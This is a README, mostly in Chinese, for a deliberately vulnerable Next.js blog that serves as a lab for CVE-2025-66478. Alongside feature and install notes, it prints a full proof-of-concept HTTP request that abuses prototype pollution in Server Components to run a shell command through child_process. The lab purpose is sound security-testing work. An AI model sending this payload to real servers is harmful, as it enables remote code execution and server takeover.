Letalandroid/cve-2025-66478_rce_vulnerable

# 使用 shadcn/ui 的现代博客 一个使用 Next.js 16、React 19、shadcn/ui 和 Tailwind CSS 构建的现代优雅博客。 # 重要提示： 这是一个**存在漏洞的 Next JS 项目**，仅出于教育、测试和漏洞利用目的创建，**不建议在生产环境中安装，仅限本地环境或受控环境使用** ## PoC ``` POST / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0 Next-Action: x X-Nextjs-Request-Id: b5dce965 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9 Content-Length: 740 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="0" { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});", "_chunks": "$Q2", "_formData": { "get": "$1:constructor:constructor" } } } ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="1" "$@0" ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="2" [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad-- ``` 参考：[github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478) ## 功能特性 - 🎨 **现代设计**：使用 shadcn/ui 构建的优雅界面 - 📝 **完整博客**：包含多个模拟内容的博客文章 - 💬 **互动反应系统**：用不同的情绪（like、love、laugh、wow、sad、angry）对帖子做出反应 - 👤 **身份验证**：使用 localStorage 的注册和登录系统 - 🎯 **响应式**：完全响应式设计 - 🌙 **暗色模式**：支持自动暗色模式 ## 技术栈 - **Next.js 16** - React 框架 - **React 19** - UI 库 - **shadcn/ui** - 现代 UI 组件 - **Tailwind CSS 4** - 实用优先的样式工具 - **TypeScript** - 静态类型 - **Lucide React** - 图标 - **Radix UI** - 无障碍组件 ## 安装说明 1. 安装依赖： ``` npm install # o yarn install # o pnpm install ``` 2. 运行开发服务器： ``` npm run dev # o yarn dev # o pnpm dev ``` 3. 在浏览器中打开 [http://localhost:3000](http://localhost:3000)。 ## 项目结构 ``` ├── app/ # Páginas de Next.js │ ├── blog/[id]/ # Página de detalle del blog │ ├── profile/ # Página de perfil │ ├── layout.tsx # Layout principal │ └── page.tsx # Página principal ├── components/ # Componentes React │ ├── auth/ # Componentes de autenticación │ ├── blog/ # Componentes del blog │ ├── layout/ # Componentes de layout │ └── ui/ # Componentes shadcn/ui ├── lib/ # Utilidades y servicios │ ├── auth.ts # Servicio de autenticación │ ├── mocks.ts # Datos mock │ └── utils.ts # Utilidades generales └── public/ # Archivos estáticos ``` ## 功能 ### 身份验证 - 新用户注册 - 登录 - 存储在 localStorage - 用户个人资料 ### 博客 - 主页文章列表 - 每篇文章的详情页 - 作者信息 - 分类和标签 - 封面图片 ### 反应 - 查看帖子的所有反应 - 用不同情绪做出反应 - 各类反应计数 - 反应用户列表 ## 模拟数据 所有数据（博客、用户、反应）均为完全模拟数据，动态生成。不需要数据库。 ## 注意事项 - 用户凭据存储在 localStorage 中 - 每次页面刷新都会重新生成数据 - 反应系统仅供展示（不会持久化新的反应） ## 许可证 本项目仅用于教育目的。

标签：Child Process, CISA项目, CVE-2025-66478, Maven, MITM代理, OPA, PoC, RCE, React, Red Teaming, shadcn/ui, Syscalls, Tailwind CSS, XML 请求, 代码执行, 全栈安全, 前端安全, 原型污染, 安全开发, 恶意样本开发, 暴力破解, 服务端组件, 漏洞复现, 漏洞验证, 网络安全, 自动化攻击, 隐私保护, 靶场